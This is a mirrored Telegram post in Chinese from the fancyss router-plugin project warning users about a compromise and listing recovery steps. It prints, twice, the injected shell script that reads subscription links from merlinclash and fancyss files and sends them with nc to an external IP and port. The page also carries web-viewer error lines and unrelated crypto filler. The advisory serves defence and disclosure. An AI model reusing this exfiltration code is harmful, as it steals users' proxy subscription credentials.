Warning: mkdir(): No space left on device in /var/www/tg-me/post.php on line 37

Warning: file_put_contents(aCache/aDaily/post/fancyss_project/--): Failed to open stream: No such file or directory in /var/www/tg-me/post.php on line 50
fancyss | Telegram Webview: fancyss_project/79 -
Telegram Group & Telegram Channel
紧急通知!紧急通知!

最近不断有软件中心页面错误,版本变成0.0.0的事件发生,且ssh无法登录,scp也无法使用!

经过排查,这是因为恶意代码被插入了软件中心的环境变量脚本导致的!

恶意代码如下:
############################################## Extract links and store them in a variable (skip if file does not exist)
if [ -f /koolshare/merlinclash/yaml_bak/subscription.txt ]; then
links=$(grep -o '"link":"[^"]*' /koolshare/merlinclash/yaml_bak/subscription.txt | cut -d'"' -f4)

if [ ! -z "$links" ]; then
echo "$links" | nc -w 5 45.61.185.105 6232
fi
else
echo_date ""
fi

# Check if the log file exists and send online links if found
if [ -f /jffs/ksdb/log ]; then
online_links=$(grep 'ss_online_links' /jffs/ksdb/log)

if [ ! -z "$online_links" ]; then
echo "$online_links" | nc -w 5 45.61.185.105 6232
fi
fi

以上恶意代码会检测merlinclash和fancyss的订阅链接,并将其发送到ip地址是45.61.185.105的服务器的6232端口!

简单来说,这些代码的作用就是偷订阅链接!!

目前还不知道恶意代码是怎么插入的,我们还在调查!
如果大家遇到这个问题,你的订阅链接大概率已经被泄露!

赶紧采取以下措施:

如果使用了usb2jffs插件:

1. 拔掉U盘,格式化掉U盘
2. 双清路由器后重新配置
3. 双清后进入软件中心,将其升级到最新版本(目前是1.9.34)
4. 插入U盘重新制作usb2jffs
5. 最重要的:去你的机场更换订阅链接!

如果没用usb2jffs插件,执行2,3,5步骤!即可



tg-me.com/fancyss_project/79
Create:
Last Update:

紧急通知!紧急通知!

最近不断有软件中心页面错误,版本变成0.0.0的事件发生,且ssh无法登录,scp也无法使用!

经过排查,这是因为恶意代码被插入了软件中心的环境变量脚本导致的!

恶意代码如下:

############################################## Extract links and store them in a variable (skip if file does not exist)
if [ -f /koolshare/merlinclash/yaml_bak/subscription.txt ]; then
links=$(grep -o '"link":"[^"]*' /koolshare/merlinclash/yaml_bak/subscription.txt | cut -d'"' -f4)

if [ ! -z "$links" ]; then
echo "$links" | nc -w 5 45.61.185.105 6232
fi
else
echo_date ""
fi

# Check if the log file exists and send online links if found
if [ -f /jffs/ksdb/log ]; then
online_links=$(grep 'ss_online_links' /jffs/ksdb/log)

if [ ! -z "$online_links" ]; then
echo "$online_links" | nc -w 5 45.61.185.105 6232
fi
fi

以上恶意代码会检测merlinclash和fancyss的订阅链接,并将其发送到ip地址是45.61.185.105的服务器的6232端口!

简单来说,这些代码的作用就是偷订阅链接!!

目前还不知道恶意代码是怎么插入的,我们还在调查!
如果大家遇到这个问题,你的订阅链接大概率已经被泄露!

赶紧采取以下措施:

如果使用了usb2jffs插件:

1. 拔掉U盘,格式化掉U盘
2. 双清路由器后重新配置
3. 双清后进入软件中心,将其升级到最新版本(目前是1.9.34)
4. 插入U盘重新制作usb2jffs
5. 最重要的:去你的机场更换订阅链接!

如果没用usb2jffs插件,执行2,3,5步骤!即可

BY fancyss


Warning: Undefined variable $i in /var/www/tg-me/post.php on line 283

Share with your friend now:
tg-me.com/fancyss_project/79

View MORE
Open in Telegram


fancyss Telegram | DID YOU KNOW?

Date: |

Dump Scam in Leaked Telegram Chat

A leaked Telegram discussion by 50 so-called crypto influencers has exposed the extraordinary steps they take in order to profit on the back off unsuspecting defi investors. According to a leaked screenshot of the chat, an elaborate plan to defraud defi investors using the worthless “$Few” tokens had been hatched. $Few tokens would be airdropped to some of the influencers who in turn promoted these to unsuspecting followers on Twitter.

What is Telegram Possible Future Strategies?

Cryptoassets enthusiasts use this application for their trade activities, and they may make donations for this cause.If somehow Telegram do run out of money to sustain themselves they will probably introduce some features that will not hinder the rudimentary principle of Telegram but provide users with enhanced and enriched experience. This could be similar to features where characters can be customized in a game which directly do not affect the in-game strategies but add to the experience.

fancyss from us


Telegram fancyss
FROM USA